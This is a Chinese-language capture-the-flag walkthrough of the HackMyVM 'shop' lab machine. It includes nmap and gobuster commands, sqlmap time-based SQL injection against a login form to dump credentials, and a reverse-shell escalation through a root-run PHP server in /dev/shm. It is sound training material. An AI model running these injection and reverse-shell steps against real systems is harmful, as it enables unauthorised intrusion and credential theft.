记一次hackmyvm综合靶场的渗透测试-shop
2022-4-10 08:48:18 Author: www.freebuf.com(查看原文) 阅读量:5 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

靶机:192.168.1.128

Kali攻击机:192.168.1.102

目标:user权限和root权限

nmap -sn 192.168.1.0/24

1649551437_6252284dc3a1c0fd2992b.png!small?1649551438120

nmap -A -p1-65535 192.168.1.102

1649551442_62522852d7004800c66d0.png!small?1649551443146

开启了80端口和65535端口:

根据信息,可见65535端口就是对应22端口,SSH的端口被修改给65535端口!

漏洞利用阶段

http://192.168.1.102/访问下看看:

1649551448_62522858e0638d5ecd09e.png!small?1649551449110

一个用户:ShellDredd!

查看下源代码:

<div class="container">

<span class="title">404 Not Found</span>

<p>

A wild 404-PAGE appeared!<br>

This means that the your browser was able to communicate with your given server, but the server could not find

what was requested.<br><br>

* Make sure the url is correct.<br>

* Don't panic.

</p>

<div>Press any key to continue _</div>

</div>

</div>

这意味着你的浏览器可以与指定的服务器通信,但是你请求的服务器找不到了!

确认url是正确的!别灰心!

接下来,我们扫描下目录!!

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.102/ -x bak,txt,html,php,log

1649551483_6252287b91aaf0afdc923.png!small?1649551483859

http://192.168.1.102/shop/

访问下:

1649551491_62522883c45410227dcaf.png!small?1649551492075

接着再一层目录扫描:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.102/shop/ -x bak,txt,html,php,log

1649551503_6252288f2b00895909061.png!small?1649551503448

访问下这个地址:一个登录界面!

http://192.168.1.102/shop/administrator/

1649551510_62522896a691b9e5bbec7.png!small?1649551510880

经测试,该界面存在基于时间的sql注入!

1649551515_6252289bd0badc8cacd16.png!small?1649551516057

执行后,页面的加载位置会一致出去加载状态!!证明确实存在漏洞!!

1649551522_625228a29d2d0c95818b3.png!small?1649551522848

这里我们采用sqlmap跑一下!

sqlmap /usr/share/sqlmap/sqlmap.py -u http://192.168.1.102/shop/administrator/ --forms --technique=T --current-db --batch

这里我们介绍一个参数:--forms

直接使用--forms参数,sqlmap会自动从-u中的url获取页面中的表单进行测试,对应本次对应的登录框!!

1649551541_625228b5e8ee53b9f3580.png!small?1649551542198

当前的库名称是Webapp,爆表!

sqlmap /usr/share/sqlmap/sqlmap.py -u http://192.168.1.102/shop/administrator/ --forms --technique=T -D Webapp --tables --batch

1649551550_625228be204f7200618ba.png!small?1649551550323

爆列!

1649551561_625228c98f45604b16efe.png!small?1649551561794

用户名和密码,爆值!

1649551566_625228ce8f7137315f51e.png!small?1649551566814

根据账户名和密码尝试web页面和ssh登录!!

这个账户可以登录!

1649551571_625228d3e4d8d506537cd.png!small?1649551572222

1649551576_625228d8242793a08f33a.png!small?1649551576535

第一个flag:

cat user.txt

gHyrSk****************CoCFnkD

权限提升阶段

只有这两个账户,接下来就是提权到root了!!

1649551598_625228eeea513b44db5c2.png!small?1649551599151

上传提权脚本!

1649551609_625228f982ba0681fa17e.png!small?1649551609751

1649551614_625228feb8854cfc7812a.png!small?1649551614947

1649551619_625229037fe661fdc3e7c.png!small?1649551619728

搜索结果:我们发现root运行过一个可疑的程序!

1649551624_625229088d49a3ced6248.png!small?1649551624798

php -S 127.0.0.1:65000 -t /dev/shm/

我们查询下这个命令具体的意思:

-S <addr>:<port> Run with built-in web server.

-t <docroot>     Specify document root <docroot> for built-in web server.

运行一个WEB服务器,该服务器根目录为/dev/shm/!!!

我们这里的思路是在该目录下上传一个反弹shell!

然后在本地访问这个目录下的地址!!LINUX下的访问!

然后再kali下监听端口!得到root的权限!!!

反弹shell地址:https://www.revshells.com/

1649551644_6252291c5fe3d958f3080.png!small?1649551644672

1649551649_6252292176fd7e4e1fd4f.png!small?1649551649780

最后的flag:

cat /root/root.txt

VZqLowpLd6******************9Ur0OAz


文章来源: https://www.freebuf.com/articles/web/328265.html
如有侵权请联系:admin#unsafe.sh